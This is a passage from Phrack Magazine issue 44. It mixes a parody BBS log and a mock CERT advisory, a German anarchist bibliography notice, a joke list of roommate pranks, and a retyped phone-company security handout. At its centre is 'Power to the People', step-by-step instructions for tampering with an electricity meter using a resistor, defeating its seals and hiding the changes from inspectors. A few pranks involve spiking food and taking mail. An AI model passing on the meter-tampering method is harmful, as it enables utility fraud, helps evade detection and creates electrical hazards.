  2457. Ey3 kAnt b3l1V3 u p0sT3d 1t!
  2458.  
  2459. U w1lL PaY d3aRly 4 ur NaRq1nG th1z BUG!
  2460. Ur dAyz r NumB3rd!@!#
  2461.  
  2462. --spaf
  2463. Forum Of OverLordS
  2464.  
  2465. [A]uto reply [N] [R]e-read [Q]uit:N
  2466.  
  2467. Number  :) 230
  2468. From    :) LOST Girl
  2469. Subject :) Bugs
  2470.  
  2471. Thanks for posting that.  I was wondering if you
  2472. I would ever get it.  Nasa probably has it...they
  2473. have every HOLE...  <sigh>  Why did I take this job?
  2474.  
  2475. L.O.S.T Girl
  2476.  
  2477. Number  :) 231
  2478. From    :) American Eagle
  2479. Subject :) That post
  2480.  
  2481. How do you use that bug?
  2482.  
  2483. I tried typing it in,but got a lot of errors.
  2484.  
  2485. Is it for some special operating system?  Or do you have
  2486. to type it in on a special port?
  2487.  
  2488. American Eagle
  2489. Forum Of OverLordS
  2490.  
  2491. [A]uto reply [N] [R]e-read [Q]uit:N
  2492.  
  2493. Number  :) 232
  2494. From    :) Zen
  2495. Subject :) New Program
  2496.  
  2497. The new version of COPS is available for Download.
  2498. Zero Day Ware!  Get it fast.  I will u/l updates/
  2499. bug fixes later...
  2500.  
  2501. Gotta love all them filepoints!
  2502.  
  2503. Off to play Xtank
  2504.  
  2505. Zen
  2506. Legion Of Security Types
  2507.  
  2508. [A]uto reply [N] [R]e-read [Q]uit:N
  2509.  
  2510. Number  :) 234
  2511. From    :) Spaf Master
  2512. Subject :) !@!#
  2513.  
  2514. Ur Pr0grA/\/\ 1z amUz1nG, But Un3l3eT
  2515.  
  2516. Eye p0Ss3z 1 0F mUch gR3aTr aB1liTy thAt Th3
  2517. 4-m w1lL Us3.
  2518.  
  2519. Ch3Ck th3 DatAbaS3 0n CERT-NET.
  2520.  
  2521. D3aTh 2 LOST
  2522.  
  2523. --spaf
  2524. Forum Of OverLordS
  2525.  
  2526. Number  :) 235
  2527. From    :) Sysop
  2528. Subject :) WARNING!
  2529.  
  2530. Someone has given out the NUP.
  2531. Some cracker type has attempted to
  2532. access the bbs as of last night.  I will call
  2533. UnCERTain Future to put out an advisory on this
  2534. issue.  Please do not give out the NUP to anyone.
  2535.  
  2536. THIS IS A PRIVATE BBS!
  2537.  
  2538. [A]uto reply [N] [R]e-read [Q]uit:N
  2539.  
  2540. End of Messages
  2541.  
  2542. [A]uto reply [N] [R]e-read [Q]uit:Q
  2543.  
  2544. *******************************************************************************
  2545.  
  2546. =============================================================================
  2547. CA-93:16                         CERT Advisory
  2548.                                October 23, 1993
  2549.                          Hacker/Cracker Vulnerabilities
  2550. -----------------------------------------------------------------------------
  2551.  
  2552. The CERT Coordination Center has learned of several vulnerabilities
  2553. in the language used on the USENET system.  This vulnerability affects
  2554. all users running rn, tin or other USENET news readers as well as users
  2555. holding discussions containing the words "hacker" or "cracker".
  2556.  
  2557. Patches can be obtained from your local phrack archive as well as through
  2558. anonymous FTP to they ftp.netsys.com (192.215.1.2) system.
  2559.  
  2560. Information concerning specific patches is outlined below. Please note
  2561. that phrack sometimes updates patch files.  If you find that the checksum
  2562. is different, please contact phrack.
  2563.  
  2564. -----------------------------------------------------------------------------
  2565.  
  2566. I.   Hack and Crack Vulnerabilities
  2567.  
  2568.      These vulnerabilities affect all systems running a USENET news-
  2569.      reader including rn and tin, as well as all conversations, papers
  2570.      and stories involving the words "Cracker" and/or "Hacker".
  2571.  
  2572.      ** This vulnerability is being actively exploited and we strongly
  2573.         recommend that sites take immediate and corrective action. **
  2574.  
  2575.      A. Description
  2576.  
  2577.         A vulnerability exists in the words "Hacker" and "Cracker" such
  2578.         that users may become confused as to exactly who/what you are
  2579.         talking about when used in a sentence.
  2580.  
  2581.      B. Impact
  2582.  
  2583.         Unauthorized confusion to affected conversations may ensue.
  2584.  
  2585.      C. Solution
  2586.  
  2587.         We recommend that all affected sites take the following steps
  2588.         to secure their systems.
  2589.  
  2590.         1.  Obtain and install the appropriate patch following the
  2591.             instructions included with the patch.
  2592.  
  2593.           System       Patch ID   Filename         Checksum
  2594.           ------       --------   ---------------  ---------
  2595.            all          10288      10288.tar.Z      5551 212
  2596.  
  2597.         The checksums shown above are from the BSD-based checksum.
  2598.  
  2599.         2.  If your conversation is found to have been compromised by
  2600.             the word "Hacker" or "Cracker", we recommend you flame
  2601.             all parties involved and immediately break up the discussion
  2602.             by talking about the "correct" meaning of the words.
  2603.  
  2604.         3.  Depending upon the sensitivity of the information contained
  2605.             in your conversation, you may wish to replace the existing
  2606.             conversation with one discussing (a) the NSA,  (b) the BATF
  2607.             (c) The Kennedy Assasination, (d) why shadowing password
  2608.             schemes are helpful or hurtful or (e) which file editor is
  2609.             actually the best.
  2610.  
  2611.  
  2612. ---------------------------------------------------------------------------
  2613. The CERT Coordination Center wishes to thank the Rogue Agent, (Rogue Agent/
  2614. SoD!/TOS/KoX), the letter 'Q' and the number '55' for reporting these
  2615. vulnerabilities and Phrack, Inc. for their response to these problems.
  2616. ---------------------------------------------------------------------------
  2617.  
  2618. If you believe that your system has been compromised, contact the CERT
  2619. Coordination Center or your representative in FIRST (Forum of Incident
  2620. Response and Security Teams).
  2621.  
  2622. Internet E-mail: cert@cert.org
  2623. Telephone: 412-268-7090 (24-hour hotline)
  2624.            CERT personnel answer 8:30 a.m.-5:00 p.m. EST(GMT-5)/EDT(GMT-4),
  2625.            and are on call for emergencies during other hours.
  2626.  
  2627. CERT Coordination Center
  2628. Software Engineering Institute
  2629. Carnegie Mellon University
  2630. Pittsburgh, PA 15213-3890
  2631.  
  2632. Past advisories, information about FIRST representatives, and other
  2633. information related to computer security are available for anonymous FTP
  2634. from cert.org (192.88.209.5).
  2635.  
  2636. *******************************************************************************
  2637.  
  2638. [** NOTE:  The following file is presented for informational and
  2639.            entertainment purposes only.  Phrack Magazine takes NO
  2640.            responsibility for anyone who attempts the actions
  2641.            described within. **]
  2642.  
  2643. Power to the People
  2644.  
  2645.  A little theory to get you started:
  2646.  
  2647. Watts=Current * Voltage
  2648.  
  2649.     A power meter consists of a voltage coil, a current coil, a small motor
  2650. to drive the dials, and little else.  Given the formula above, if we can
  2651. somehow cut down the voltage that the meter 'sees', then we can reduce the
  2652. number of watts that it measures.  If we cut our voltage in 1/2, our watts
  2653. also get cut in half.
  2654.  
  2655.     Fortunately, your meter doesn't read the voltage directly off of the
  2656. lines into your house.  Two small wires lead to the voltage coil within the
  2657. meter.  Simple modification to this circuit is all that is needed.  Inserting
  2658. a resistor in series with the voltage coil will cut the voltage that the
  2659. meter sees, and therefore that wattage that it reads.
  2660.  
  2661.     Meters read Kilowatts per hour, and you pay so much for each kilowatt.
  2662. Since the hours remain constant (unless your stuck in one of those nasty
  2663. little dimensional time warps..and I really hate it when that happens), your
  2664. bill is directly related to what resistor value you insert.  Do this
  2665. correctly, and carefully, you will save a bundle on the power you use.
  2666.  
  2667.     Say I cut my bill by $40 per month..$40 * 12 months = $480 saved with
  2668. a original 'investment' of $5 that is a 96 fold return on your investment.
  2669. This idea also might be used to provide a service to your trusted friends,
  2670. $100 bux a mod or so..$$$
  2671.  
  2672.     One last little caution before you begin, don't go messing around with
  2673. the adjustment screws you will find, usually there are 2 of them with F & S
  2674. marked near them.  I had the foolish idea to mess with these, the result is
  2675. when I am drawing very little power (a few watts) my meter will slowly run
  2676. backwards.  Next time I'm modifying it, I'll have to fix that.  Mr. Meter
  2677. Reader would really wonder what the heck was going on when he saw that.
  2678. (Mr. Meter Reader will be thinking he's done far to many drugs on the
  2679. weekend..or needs to be.)
  2680.  
  2681. SUPPLIES NEEDED:
  2682.  
  2683.     (2) Power meters.  You'll perform the mod on one, and use the other to
  2684.         have in while you're doing it.
  2685.     (1) Length of heat shrink tubing, a sufficient size to cover a half
  2686.         watt resistor.
  2687.     (Some) half-watt resistors, 10k-25k or so.  (A 10K resistor will cut
  2688.            your bill in half...15K quit a bit more (the amount saved, is
  2689.            NOT linear to the resistor value..more like a logarithmic scale)
  2690.  (some) Good old 100% silicon caulk
  2691.     Soldering iron, solder, lots of nerve.
  2692.  
  2693. To begin the Mod:
  2694.  
  2695.     Take the little 'lock' they use (little plastic deal), and chuck it.  Wait
  2696. about 2 months for the reader to get used to the fact it's gone..the idea
  2697. is that if they think you've tampered with it cause the lock is gone..they
  2698. will check and find no tampering then..(least that's the idea)
  2699.  
  2700.     If you happen to know someone who works for the power company, and can
  2701. get your hands on some of those locks, get a few new ones, and let them 'age'
  2702. outside for a few months (to get that used look), then replace yours with it
  2703. when done.  And if anyone happens to know of a source for these locks, I
  2704. would appreciate knowing.
  2705.  
  2706.     You'll need to 'find/get/steal/snag/etc' another meter to put in while your
  2707. fixing your..(kinda hard to see/solder with no power) ;)
  2708.  
  2709.     Lift the now unlocked cover and pull meter out..(simply pulls out of the
  2710. socket real easy) put other meter in for a while..(do at night would be a good
  2711. idea..neighbors would wonder what the heck you were doing eh?)
  2712.  
  2713.     On the side of the meter, there will be a little (probably copper), pin,
  2714. that is designed to break when you unbend the end of it..(security device).
  2715. Be real careful and try not to break it when you bend it back (if it breaks,
  2716. save the piece that broke off)
  2717.  
  2718.     Pull that out, and then turn the ring that holds the unit together..it
  2719. should then come apart real easy.
  2720.  
  2721.     Between the assembly where the wheel is and the base plate, look in the gap,
  2722. there should be a black deal that looks like a transformer attached to the core
  2723. of the meter and 2 black wires leading from the prongs of the meter base to
  2724. the smaller coil.  This is the voltage coil.  Here comes the fun part!
  2725.  
  2726.     Cut one of the wires, being sure you cut where you can hide the damage
  2727. later.  Solder in 10k or 15k resistor with the leads of resistor cut off right
  2728. at resistor body, and also put the heat shrink tubing on the resistor, and
  2729. shrink it..(with heat preferably) ;)
  2730.  
  2731.     Take silicone rubber (the 100% pure stuff..) and glue the resistor and the
  2732. shrunk tubing over it underneath the top assembly.  Make it appear that the
  2733. wires simply curve up that way and nothing more.  Put ring back on.  Notice
  2734. that you must put the meter together exactly the way it came apart.
  2735. Example:  on mine, i noticed that there was dirt on the bottom from rain
  2736. splashing mud onto the meter.  It would look kinda obvious if the mud
  2737. suddenly appeared on top of the meter.
  2738.  
  2739.     Take the little pin that you removed (copper thing) and replace it in
  2740. the hole and through the ring as before. Bend the end back up like before
  2741. also if it broke, bend what is left anyways, there should be plenty left
  2742. to bend.  Take the broken end (if it broke), and jam it under the end of
  2743. the bend to make it look legit.  If they do pull the meter to inspect,
  2744. they will hopefully just think that it might have broke loose when it was
  2745. installed.
  2746.  
  2747.     I have noticed on some unmodified meters that I 'found' that the security
  2748. pin has been broken already.  So It's reasonable safe to assume that they
  2749. don't take much faith in them.
  2750.  
  2751.     When done, you should NOT be able to tell if any mods have been done by
  2752. looking.  Be sure it's undetectable, they get kinda mad when you do things
  2753. like this for some odd reason.  It's suggested that after the modification,
  2754. you have a friend, who you trust not to fink, take a very close look to
  2755. see if they can spot any mods.
  2756.  
  2757.     Your bill should drop in half or more..if you really want to drop the
  2758. bill..do this in steps.. a few months apart..so they won't notice that your
  2759. bill is dropping like a rock.  Just don't get silly.  Using only 1kwh per
  2760. month just yells fraud.  Mine went from $80-$90 a month to around $30-$37
  2761. month with a 10K resistor (I added a electric dryer and other items during
  2762. that month also.)
  2763.  
  2764.     You might want to try this a few times on other meters you've 'found'
  2765. just to get the nack of it first, it should work with all meters.  At least
  2766. the ones they use in my area.
  2767.  
  2768. Table of comparisons:
  2769.  
  2770. test made using 1320 watt electric heater.
  2771. 120V
  2772. 11 amps
  2773. 1.3 KWH
  2774.  
  2775. resistor value              rev per time        voltage cross resistor rev/hour
  2776. ------------------------------------------------------------------------------
  2777. 0                           1 rev/23 seconds     0                     156
  2778. 1k                          1 rev/24 seconds     9.                    150
  2779. 10K                         1 rev/42 seconds    63                      85
  2780. 12k                         1 rev/53 seconds                            68
  2781. 39K                         1 rev/464 seconds   ???                      7.25
  2782.  
  2783.  
  2784.  
  2785.     Notice the 39K resistor's performance, NOT a good choice to use, it
  2786. will cut your bill to 4% of the original.  They will wonder about this.
  2787. I'm currently using 10K which will cut it to approx 54% of the original bill.
  2788. My bill is around 1/2 previous. Saving me approx $30-$50 a month in power
  2789. bills.  Not bad for a 10 cent resistor.
  2790.  
  2791.     Keep in mine the wattage rating of the resistor.  Measure the voltage
  2792. across the resistor.  Take that number divide it by the resistor your using
  2793. to get current.  Take the current times current (square it), and multiply
  2794. this by resistance value to get the wattage of resistor that is required.
  2795. After all, it would not be a good thing for the resistor to go up in smoke.
  2796. Mr. Meter Reader would wonder why you used 0 kwh this month.
  2797.  
  2798.     There also is another method that in theory will make your power bill less,
  2799. this is called 'power factor correction', but unfortunately requires the use
  2800. of some rather large (read expensive) AC cap's.  For this reason (and the fact
  2801. it cost under $5 and provides more of a benefit), the method of using the
  2802. resistor is more useful and do-able by the everyone (especially those
  2803. who despise the 'system').
  2804.  
  2805.  
  2806. Notice that I have NOT left a email address or the like for correspondence,
  2807. namely due to the fact that this is highly illegal and greatly frowned upon
  2808. by the authorities.  If anyone has a need to contact me they may do so via
  2809. phrack magazine, they can forward mail to me.  If you do this modification
  2810. correctly and per instructions, you will indeed save money.  Have fun,
  2811. be careful, and challenge the system at every turn.
  2812.  
  2813. *******************************************************************************
  2814.  
  2815.  
  2816.   DATA BANK OF THE GERMAN SPEAKING AN-ARCHISM
  2817.       The Da.d.A. Project
  2818.          DAtenbank des Deutschsprachigen Anarchismus
  2819.  
  2820. Berlin, Koln
  2821.  
  2822.     The history of the liberative movement has not yet been filed sufficiently.
  2823. That is, mainly, due to the lack of scientists with interest in exploring this
  2824. area.  Thanks to that, people who need bibliographic information for some
  2825. specific themes of the history of anarchism, must go through all direct sources
  2826. and derive from those some conclusions.  Things are more difficult in case
  2827. modern literature is required, for the theory and practice of liberative
  2828. movements, which have appeared in the meantime.
  2829.  
  2830.     The data bank of the German speaking anarchism (DAtenbank des
  2831. Deutschsprachigen Anarchismus) is trying to cover the lack of bibliographic
  2832. material.  Currently it files anarchistic or, generally, liberative documents
  2833. and publishes.  Later it will comprehend documents which deal with the history
  2834. and theory of those movements.
  2835.  
  2836.     We are focusing our compilation activities, to the German speaking areas
  2837. with plans of enhancing that shortly.  In parallel we are elaborating
  2838. an introduction to the publishing history of the printed material, which will
  2839. be informative for their political and editorial meanings.
  2840.  
  2841.     From the early 1980's, the filing of the German liberative press is open
  2842. for exploration.  It covers the chronological period from the philosophic
  2843. commencements of the German anarchism, in the 1832, until nowadays.  Strength
  2844. of expression is given to newspapers and magazines, though collections of
  2845. documents, almanacs, year-books, congresses' protocols and catalogs are
  2846. not omitted.
  2847.  
  2848.     Except of the anarchistic publishes we are also registering material whose
  2849. cooperatives or publishers were anarchists.  The filing is achieved using all
  2850. the usual bibliographical criterion (titles, publishers, date/district,
  2851. circulation, place of distribution et cetera).
  2852.  
  2853.     In order to handle the increasing demands of the people who would like to
  2854. access our material, we decided to publish our first synthetic registers in a
  2855. series of brochures.  This publication, in restricted copies and four or five
  2856. continuations, will be available at the "File of Social and Civilization
  2857. History" of the 'Libertad' publications in Berlin.  The first brochure, is
  2858. occupied with the German liberative press from 1832 to 1890.  Every copy of
  2859. this serial includes a diagram of the press' history, chronological
  2860. bibliography of the magazines and an index.
  2861.  
  2862.     We resume special researches through the data bank and we offer the results
  2863. printed.  Until now we have filed over 1000 titles, which offer many different
  2864. elements for research each.
  2865.  
  2866.     Da.d.A. is a private, research project.  We do not accept donations from
  2867. state institutions and other similar organizations.  In that way we can
  2868. continue our efforts undistracted and independent.  The disadvantage is
  2869. that we support Da.d.A. with personal expenses and when we have free time
  2870. available.
  2871.  
  2872.     The modern liberative press is difficult to register and get filed.
  2873. Although liberative publications were developed in an unprecedented way
  2874. (and not only arithmetically) after 1968, few publications are accessible
  2875. from libraries and files.  Especially today we must tune up our practises
  2876. in order to protect modern press.  We encourage every publisher of anarchistic
  2877. material, even if productions are ceased nowadays, to send us information and,
  2878. if possible, a copy of their publications.  They will get registered in our
  2879. computer and filed in the library for the Research of Social Demands, in
  2880. order to be accessible for studies in the future.
  2881.  
  2882.     For more information about the Da.d.A. project and the possibilities of
  2883. using the data bank, you can contact us in the following addresses:
  2884.  
  2885.  BERLINER GESELLSCHAFT ZUM STUDIUM SOZIALER FRAGEN e.V.
  2886.     Projekt: Datenbank des Deutschsprachigen Anarchismus (Da.d.A.)
  2887.  
  2888.  c/o Jochen Schmuck  c/o Gunter Hoering
  2889.  Postfach 440 349  Pfalzer Str.27
  2890.  1000 BERLIN 44   5000 KOLN 1
  2891.  Tel. 030/686 65 24  Tel. 0221/21 81 49
  2892.  
  2893. *******************************************************************************
  2894.  
  2895. [Don't ask me why I'm printing this.  I just think it's funny as hell.]
  2896.  
  2897. 100 WAYS TO FREAK OUT YOUR ROOMMATE
  2898.  
  2899. 1.   Smoke jimson weed.  Do whatever comes naturally.
  2900.  
  2901. 2.   Switch the sheets on your beds while s/he is at class.
  2902.  
  2903. 3.   Twitch a lot.
  2904.  
  2905. 4.   Pretend to talk while pretending to be asleep.
  2906.  
  2907. 5.   Steal a fishtank.  Fill it with beer and dump sardines in it.  Talk to
  2908.      them.
  2909.  
  2910. 6.   Become a subgenius.
  2911.  
  2912. 7.   Inject his/her twinkies with a mixture of Dexatrim and MSG.
  2913.  
  2914. 8.   Learn to levitate.  While your roommate is looking away, float up out of
  2915.      your seat.  When s/he turns to look, fall back down and grin.
  2916.  
  2917. 9.   Speak in tongues.
  2918.  
  2919. 10.  Move you roommate's personal effects around.  Start out subtle.
  2920.      Gradually work up to big things, and eventually glue everything s/he
  2921.      owns to the ceiling.
  2922.  
  2923. 11.  Walk and talk backwards.
  2924.  
  2925. 12.  Spend all your money on Jolt Cola.  Drink it all.  Stack the cans in
  2926.      the middle of your room.  Number them.
  2927.  
  2928. 13.  Spend all your money on Transformers.  Play with them at night.  If
  2929.      your roommate says anything, tell him/her with a straight face, "They're
  2930.      more than meets the eye."
  2931.  
  2932. 14.  Recite entire movie scripts (e.g. "The Road Warrior," "Repo Man,"
  2933.      Casablanca,") almost inaudibly.
  2934.  
  2935. 15.  Kill roaches with a monkey wrench while playing Wagnerian arias on a
  2936.      kazoo.  If your roommate complains, explain that it is for your
  2937.      performance art class (or hit him/her with the wrench).
  2938.  
  2939. 16.  Collect all your urine in a small jug.
  2940.  
  2941. 17.  Chain yourself to your roommate's bed.  Get him/her to bring you food.
  2942.  
  2943. 18.  Get a computer.  Leave it on when you are not using it.  Turn it off
  2944.      when you are.
  2945.  
  2946. 19.  Ask your roommate if your family can move in "just for a couple of
  2947.      weeks."
  2948.  
  2949. 20.  Buy as many back issues of Field and Stream as you can.  Pretend to
  2950.      masturbate while reading them.
  2951.  
  2952. 21.  Fake a heart attack.  When your roommate gets the paramedics to come,
  2953.      pretend nothing happened.
  2954.  
  2955. 22.  Eat glass.
  2956.  
  2957. 23.  Smoke ballpoint pens.
  2958.  
  2959. 24.  Smile.  All the time.
  2960.  
  2961. 25.  Collect dog shit in baby food jars.  Sort them according to what you
  2962.      think the dog ate.
  2963.  
  2964. 26.  Burn all your waste paper while eying your roommate suspiciously.
  2965.  
  2966. 27.  Hide a bunch of potato chips and Ho Hos in the bottom of a trash can.
  2967.      When you get hungry, root around in the trash.  Find the food, and eat it.
  2968.      If your roommate empties the trash before you get hungry, demand that s/he
  2969.      reimburse you.
  2970.  
  2971. 28.  Leave a declaration of war on your roommate's desk.  Include a list of
  2972.      grievances.
  2973.  
  2974. 29.  Paste boogers on the windows in occult patterns.
  2975.  
  2976. 30.  Shoot rubber bands at your roommate while his/her back is turned, and
  2977.      then look away quickly.
  2978.  
  2979. 31.  Dye all your underwear lime green.
  2980.  
  2981. 32.  Spill a lot of beer on his/her bed.  Swim.
  2982.  
  2983. 33.  Bye three loaves of stale bread.  Grow mold in the closet.
  2984.  
  2985. 34.  Hide your underwear and socks in your roommate's closet.  Accuse
  2986.      him/her of stealing it.
  2987.  
  2988. 35.  Remove your door.  Ship it to your roommate's parents (postage due).
  2989.  
  2990. 36.  Pray to Azazoth or Zoroaster.  Sacrifice something nasty.
  2991.  
  2992. 37.  Whenever your roommate walks in, wait one minute and then stand up.
  2993.      Announce that you are going to take a shower.  Do so.  Keep this up for
  2994.      three weeks.
  2995.  
  2996. 38.  Array thirteen toothbrushes of different colors on your dresser.
  2997.      Refuse to discuss them.
  2998.  
  2999. 39.  Paint your half of the room black.  Or paisley.
  3000.  
  3001. 40.  Whenever he/she is about to fall asleep, ask questions that start with
  3002.      "Didja ever wonder why...."  Be creative.
  3003.  
  3004. 41.  Shave one eyebrow.
  3005.  
  3006. 42.  Put your mattress underneath your bed.  Sleep down under there and pile
  3007.      your dirty clothes on the empty bedframe.  If your roommate comments,
  3008.      mutter "Gotta save space," twenty times while twitching violently.
  3009.  
  3010. 43.  Put horseradish in your shoes.
  3011.  
  3012. 44.  Shelve all your books with the spines facing the wall.  Complain loudly
  3013.      that you can never find the book that you want.
  3014.  
  3015. 45.  Always flush the toilet three times.
  3016.  
  3017. 46.  Subsist entirely on pickles for a week.  Vomit often.
  3018.  
  3019. 47.  Buy a copy of Frankie Yankovic's "Pennsylvania Polka," and play it at
  3020.      least 6 hours a day.  If your roommate complains, explain that it's an
  3021.      assignment for your primitive cultures class.
  3022.  
  3023. 48.  Give him/her an allowance.
  3024.  
  3025. 49.  Listen to radio static.
  3026.  
  3027. 50.  Open your window shades before you go to sleep each night.  Close them
  3028.      as soon as you wake up.
  3029.  
  3030. 51.  Cry a lot.
  3031.  
  3032. 52.  Send secret admirer notes on your roommate's blitzmail.
  3033.  
  3034. 53.  Clip your fingernails and toenails and keep them in a baggie. Leave the
  3035.      baggie near your computer and snack from it while studying. If he/she
  3036.      walks by, grab the bag close and eye him/her suspiciously.
  3037.  
  3038. 54.  Paste used kleenexes to his/her walls.
  3039.  
  3040. 55.  Whenever your roomate comes in from the shower, lower your eyes and
  3041.      giggle to yourself.
  3042.  
  3043. 56.  If you get in before your roomate, go to sleep in his/her bed.
  3044.  
  3045. 57.  Put pornos under his/her bed. Whenever someone comes to visit your
  3046.      roommate when they're not home, show them the magazines.
  3047.  
  3048. 58.  Whenever you go to sleep, start jumping on your bed . . . do so for a
  3049.      while, then jump really high and act like you hit your head on the ceiling.
  3050.      Crumple onto your bed and fake like you were knocked out . . . use this
  3051.      method to fall asleep every night for a month.
  3052.  
  3053. 59.  If your roommate goes away for a weekend, change the locks.
  3054.  
  3055. 60.  Whenever his/her parents call and ask for your roommate, breathe into the
  3056.      phone for 5 seconds then hang up.
  3057.  
  3058. 61.  Whenever he/she goes to shower, drop whatever you're doing, grab a towel,
  3059.      and go shower too.
  3060.  
  3061. 62.  Find out your roommate's post office box code.  Open it and take his/her
  3062.      mail.  Do this for one month. After that, send the mail to him/her by UPS.
  3063.  
  3064. 63.  Collect all of your pencil shavings and sprinkle them on the floor.
  3065.  
  3066. 64.  Create an imaginary cat for a pet.  Talk to it every night, act like
  3067.      you're holding it, keep a litter box under your desk.  After two weeks,
  3068.      say that your cat is missing.  Put up signs in your dorm, blame your
  3069.      roommate.
  3070.  
  3071. 65.  Call safety & security whenever your roommate turns up his/her music.
  3072.  
  3073. 66.  Follow him/her around on weekends.
  3074.  
  3075. 67.  Sit on the floor and talk to the wall.
  3076.  
  3077. 68.  Whenever the phone rings, get up and answer the door.
  3078.  
  3079. 69.  Whenever someone knocks, answer the phone.
  3080.  
  3081. 70.  Take his/her underwear.  Wear it.
  3082.  
  3083. 71.  Whenever your roommate is walking through the room, bump into him/her.
  3084.  
  3085. 72.  Stare at your roommate for five minutes out of every hour.  Don't say
  3086.      anything, just stare.
  3087.  
  3088. 73.  Tell your roommate that someone called and said that it was really
  3089.      important but you can't remember who it was.
  3090.  
  3091. 74.  Let mice loose in his/her room.
  3092.  
  3093. 75.  Give each of your walls a different name.  Whenever you can't answer a
  3094.      problem, ask each of your walls.  Write down their responses, then ask
  3095.      your ceiling for the final answer.  Complain to your roommate that
  3096.      you don't trust your ceiling.
  3097.  
  3098. 76.  Take your roommate's papers and hand them in as your own.
  3099.  
  3100. 77.  Skip to the bathroom.
  3101.  
  3102. 78.  Take all of your roommate's furniture and build a fort.  Guard the fort
  3103.      for an entire weekend.
  3104.  
  3105. 79.  Gather up a garbage bag full of leaves and throw them in a pile in
  3106.      his/her room.  Jump in them.  Comment about the beautiful foliage.
  3107.  
  3108. 80.  When you walk into your room, turn off your lights.  Turn them on when
  3109.      you leave.
  3110.  
  3111. 81.  Print up satanic signs and leave them in your room where he/she
  3112.      can find them.
  3113.  
  3114. 82.  Whenever you're on the phone and he/she walks in, hang up immediately
  3115.      without saying anything and crawl under your desk.  Sit there for
  3116.      two minutes than call whoever it was back.
  3117.  
  3118. 83.  Insist on writing the entire lyrics to American Pie on your ceiling above
  3119.      your bed.  Sing them every night before you go to bed.
  3120.  
  3121. 84.  Use a bible as Kleenex.  Yell at your roommate if they say Jesus or God
  3122.      Damnit.
  3123.  
  3124. 85.  Burn incense.
  3125.  
  3126. 86.  Eat moths.
  3127.  
  3128. 87.  Buy Sea Monkeys and grow them.  Name one after your roommate.  Announce
  3129.      the next day that it died.  Name another one after your roommate.
  3130.      The next day say that it died.  Keep this up until they all die.
  3131.  
  3132. 88.  Collect Chia-Pets.
  3133.  
  3134. 89.  Refuse to communicate in anything but sign language.
  3135.  
  3136. 90.  Eat a bag of marshmallows before you go to bed.  The next day, spray
  3137.      three bottles of whipped cream all over your floor.  Say you got sick.
  3138.  
  3139. 91.  Wipe deodorant all over your roommate's walls.
  3140.  
  3141. 92.  If you know that he/she is in the room, come barging in out of breath.
  3142.      Ask if they saw a fat bald naked Tibetan man run through carrying a
  3143.      hundred dollar bill.  Run back out swearing.
  3144.  
  3145. 93.  Leave apple cores on his/her bed.
  3146.  
  3147. 94.  Keep feces in your fridge.  Complain that there is never anything to eat.
  3148.  
  3149. 95.  Piss in a jar and leave it by your bed.  When your roommate isn't looking,
  3150.      replace it with a jar of apple juice.  Wait until your roommate turns
  3151.      around.  Drink it.
  3152.  
  3153. 96.  Don't ever flush.
  3154.  
  3155. 97.  Buy an inflatable doll.  Sleep with it.
  3156.  
  3157. 98.  Hang stuffed animals with nooses from your ceiling.  Whenever you walk by
  3158.      them mutter, "You shouldn't have done that to me."
  3159.  
  3160. 99.  Lick him/her while they are asleep.
  3161.  
  3162. 100. Dress in drag.
  3163.  
  3164. *******************************************************************************
  3165.                          ==Phrack Magazine==
  3166.  
  3167.               Volume Four, Issue Forty-Four, File 4 of 27
  3168.  
  3169.  
  3170.                            //   //  /\   //   ====
  3171.                           //   //  //\\ //   ====
  3172.                          ==== //  //  \\/   ====
  3173.  
  3174.                      /\   //  // \\    //  /===   ====
  3175.                     //\\ //  //   //  //   \=\   ====
  3176.                    //  \\/    \\ //  //   ===/  ====
  3177.  
  3178.                                 PART II
  3179. ******************************************************************************
  3180.  
  3181. <Retyped From an Actual SWBT Handout>
  3182.  
  3183. SOUTHWESTERN BELL TELEPHONE
  3184.  
  3185. Computer
  3186. Security
  3187. Guidelines
  3188.  
  3189. Computer Security is YOUR Responsibility.
  3190.  
  3191. These guidelines are designed to help you know and meet your corporate
  3192. obligation.
  3193.  
  3194. Prepared by:  Information Systems
  3195.               Computer Security Administration
  3196.               One Bell Center 22-H-8
  3197.               St. Louis, MO 63101
  3198.  
  3199. For Users
  3200. ---------
  3201.  
  3202. Keep your logon and password information private.
  3203. Do not write down passwords, but if you must, keep them in a locked place.
  3204. Do not store your password in the computer.
  3205. Make sure no on sees you enter your passwords.
  3206. Pick non-obvious, non-guessable passwords.
  3207. Do not share your logons or passwords.
  3208. Change passwords periodically, at least every thirty days.
  3209. Open new computer logons for computer resources only when you have a
  3210.   real need.
  3211. Close computer logons you no longer need.
  3212. Make sure you have proper protection settings on sensitive computer files.
  3213. Do not send confidential information through electronic mail or computer
  3214.   news systems.
  3215. If you suspect security violations, tell management immediately.
  3216. Be sure that use of computing resources is for company approved purposes
  3217.   only.
  3218. Do not access any information that your management has not authorized you
  3219.   to have.  When in doubt, ask!
  3220. Logoff when you leave your terminal.
  3221. If you dialed in, disconnect when you are finished working.
  3222.  
  3223. For Managers of Computing Facilities
  3224. ------------------------------------
  3225.  
  3226. Provide procedures to control access to computing resources.
  3227. Provide facilities to let users protect proprietary information from
  3228.   disclosure to unauthorized persons.
  3229. Be sure that connection of a computer to any network does not diminish
  3230.   the control a user has over programs and data.
  3231. Provide appropriate security facilities and procedures to protect
  3232.   computing hardware against damage.
  3233. Provide facilities to protect user's data and programs from undesired
  3234.   changes or destruction.
  3235. Ensure that computing resource use has been authorized by a member of
  3236.   supervision.
  3237. Make sure that computing resource use can be tracked to individuals.
  3238. Report to managers regularly on the extent of computing resource use.
  3239. Provide appropriate backup facilities for data and programs.
  3240. Provide audit trails which identify violations and security breaches
  3241.   and examine them regularly.
  3242. For assistance in coordinating computer security activities, contact the
  3243.   Computer Security Administrator.
  3244.  
  3245. For Managers
  3246. ------------
  3247.  
  3248. Make sure you authorize all use of computing resources and that you require
  3249.   separate logons for each individual.
  3250. Make sure that the user of computer resources understands responsibilities
  3251.   with respect to proper use and security consciousness.
  3252. Review computing resource usage reports and the security practices of the
  3253.   users for which you are responsible.
  3254. When a user's employment or need for access ends or changes, make sure
  3255.   access to computer resources is promptly changed by notifying your
  3256.   System Administrator.
  3257. Report security violations to the General Security Manager and to the
  3258.   Computer Security Administration Group.
  3259.  
  3260. For Information
  3261. ---------------
  3262.  
  3263. The Information Systems Organization provides security and disaster recovery
  3264.   services to establish, monitor, and audit computer security standards.
  3265. If you have any comments or questions regarding computer security, please
  3266.   contact the Computer Security Administration.
  3267.  
  3268. *******************************************************************************
  3269.  
  3270.                      RBOC ORGANIZATIONAL ARCHITECTURE
  3271.  
  3272.                                Compiled By
  3273.  
